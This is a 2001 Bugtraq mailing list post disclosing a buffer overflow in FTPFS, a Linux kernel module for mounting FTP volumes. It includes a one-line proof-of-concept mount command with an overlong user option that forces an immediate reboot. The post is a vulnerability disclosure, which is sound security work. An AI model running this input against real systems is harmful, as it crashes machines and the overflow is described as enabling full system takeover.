Bugtraq mailing list archives

Buffer oveflow in FTPFS (linux kernel module)


From: "Frank DENIS (Jedi/Sector One)" <j () 4U NET>
Date: Tue, 13 Mar 2001 15:24:14 +0100

  FTPFS (http://sourceforge.net/projects/ftpfs) is a Linux kernel module,
enhancing VFS with FTP volume mounting capabilities.

  However, it has insufficient bounds checking. If a user can enter mount
options through a wrapper, he can take over the whole system, even with
restricted capabilities.

  Here's a simple exploit :

mount -t ftpfs none /mnt -o ip=127.0.0.1,user=xxxxxxxxxxxxxxxxxxxxxxxxxxxx...

  The previous command produces an immediate reboot (tested with kernel 2.4.2
and FTPFS 0.1.1) .

  The author is aware of that vulnerability.

  Best regards,

--
  -=- Frank DENIS aka Jedi/Sector One < spam () jedi claranet fr > -=-
                LINAGORA SA (Paris, France) : http://www.linagora.com


Current thread: